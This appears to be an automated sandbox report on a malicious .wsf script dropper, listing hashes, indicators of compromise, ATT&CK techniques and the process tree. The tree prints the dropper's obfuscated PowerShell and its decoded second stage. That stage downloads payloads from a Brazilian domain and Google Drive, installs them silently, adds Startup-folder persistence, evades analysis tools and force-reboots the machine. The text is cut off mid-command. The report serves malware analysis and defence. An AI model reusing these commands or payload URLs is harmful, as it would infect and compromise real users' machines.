61801bf75d5af4f325190112cdd42e811a857d77284db0cd8022f926ae922823

General

Target

ba164adf0e3d7ada31a03e9bf73e26f5.wsf
Size

31KB
MD5

ba164adf0e3d7ada31a03e9bf73e26f5
SHA1

2580810407a9e6189d3ea643c6a49679babf230c
SHA256

61801bf75d5af4f325190112cdd42e811a857d77284db0cd8022f926ae922823
SHA512

c674aeb0c34c9b9c66b99384f5a75ab77aad9c14356f33a0ef741325f1de455af635f73bc14b8283ed7890cfbf875adbfb9d48a84904cd080a6f22962dba9e57
SSDEEP

768:i+vnInInInInInInInIncnjnInInInInInInInInInInInInInInInInm:i+f22222222yL2222222222222222m

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

exe.dropper

https://drive.google.com/uc?export=download&id=

exe.dropper

https://desckvbrat.com.br/Upcrypter/01/DLL01.txt

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	3064	WScript.exe
7	2832	powershell.exe
9	2832	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ba164adf0e3d7ada31a03e9bf73e26f5.wsf	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ba164adf0e3d7ada31a03e9bf73e26f5.wsf	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe
2832	powershell.exe
2364	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2796	powershell.exe
2832	powershell.exe
1448	powershell.exe
2364	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 2796	3064	WScript.exe	30
PID 3064 wrote to memory of 2796	3064	WScript.exe	30
PID 3064 wrote to memory of 2796	3064	WScript.exe	30
PID 2796 wrote to memory of 2832	2796	powershell.exe	32
PID 2796 wrote to memory of 2832	2796	powershell.exe	32
PID 2796 wrote to memory of 2832	2796	powershell.exe	32
PID 2832 wrote to memory of 1448	2832	powershell.exe	33
PID 2832 wrote to memory of 1448	2832	powershell.exe	33
PID 2832 wrote to memory of 1448	2832	powershell.exe	33
PID 1448 wrote to memory of 2276	1448	powershell.exe	34
PID 1448 wrote to memory of 2276	1448	powershell.exe	34
PID 1448 wrote to memory of 2276	1448	powershell.exe	34
PID 2832 wrote to memory of 2364	2832	powershell.exe	35
PID 2832 wrote to memory of 2364	2832	powershell.exe	35
PID 2832 wrote to memory of 2364	2832	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba164adf0e3d7ada31a03e9bf73e26f5.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hscsj = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFAAdw' + [char]66 + 'XAFcAdAAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + 'PAG8AQQ' + [char]66 + 'NAHEALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAUA' + [char]66 + '3AFcAVw' + [char]66 + '0ACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAUA' + [char]66 + '3AFcAVw' + [char]66 + '0ACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFAAdw' + [char]66 + 'XAFcAdAAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'QAHcAVw' + [char]66 + 'XAHQAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'KAHkAVQ' + [char]66 + 'EAHEAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'QAHcAVw' + [char]66 + 'XAHQAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'KAHkAVQ' + [char]66 + 'EAHEAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoARA' + [char]66 + 'tAHcAbQAkADsAIAApACAARQ' + [char]66 + 'NAEsAZg' + [char]66 + '1ACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoARA' + [char]66 + 'tAHcAbQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAARQ' + [char]66 + 'NAEsAZg' + [char]66 + '1ACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAEoAeQ' + [char]66 + 'VAEQAcQAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAGMAZQ' + [char]66 + 'tAFIAYwAkADsAeQ' + [char]66 + 'NAGUAcw' + [char]66 + 'hAEIAIAA9ACAAYw' + [char]66 + 'lAG0AUg' + [char]66 + 'jACQAIAA7AGMAZQ' + [char]66 + 'tAFIAYwAkACAAPQAgAGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7ACAAKQAgAGsAZA' + [char]66 + '6AHgAYwAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkACAAPQAgAGMAZQ' + [char]66 + 'tAFIAYwAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACgAIAA9ACAAaw' + [char]66 + 'kAHoAeA' + [char]66 + 'jACQAOw' + [char]66 + '9ADsAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'uAHIAdQ' + [char]66 + '0AGUAcgA7ACkAKQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkADsAew' + [char]66 + '5AE0AZQ' + [char]66 + 'zAGEAQgAgAG4Abw' + [char]66 + 'pAHQAYw' + [char]66 + 'uAHUARgA7AGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFEARg' + [char]66 + '2AHoAVAAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFEARg' + [char]66 + '2AHoAVAAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAbg' + [char]66 + 'sAGcAcA' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAcA' + [char]66 + 'tAHQAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHAAbQ' + [char]66 + '0AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHAAbQ' + [char]66 + '0AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAG4AbA' + [char]66 + 'nAHAAbgAkACgAIAA9ACAAbg' + [char]66 + 'sAGcAcA' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAbg' + [char]66 + 'sAGcAcA' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + 'uAGwAZw' + [char]66 + 'wAG4AJA' + [char]66 + '7ACAAKQAgAFEAZA' + [char]66 + 'lAGMAVAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAUQ' + [char]66 + 'kAGUAYw' + [char]66 + 'UACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAG4AbA' + [char]66 + 'nAHAAbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$hscsj = $hscsj.replace('уЦϚ' , 'B') ;;$ddlzy = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hscsj ) ); $ddlzy = $ddlzy[-1..-$ddlzy.Length] -join '';$ddlzy = $ddlzy.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\ba164adf0e3d7ada31a03e9bf73e26f5.wsf');powershell $ddlzy
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$npgln = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$npgln = ($npgln + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$npgln = ($npgln + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$ztmpt = (New-Object Net.WebClient);$ztmpt.Encoding = [System.Text.Encoding]::UTF8;$ztmpt.DownloadFile($npgln, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\ba164adf0e3d7ada31a03e9bf73e26f5.wsf' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$Stringbase;Function BaseMy{;$Fyfdz = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $Fyfdz;};$cxzdk = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $cxzdk ) ;$Stringbase = $cRmec; $cRmec = BaseMy;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$qDUyJ = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME = ( Get-Content -Path $JukpV ) ;$mwmDz = $PhrlN.DownloadString( $ufKME ) ;$mwmDz | Out-File -FilePath $qDUyJ -force ;$tWWwP = '$sNwoM = 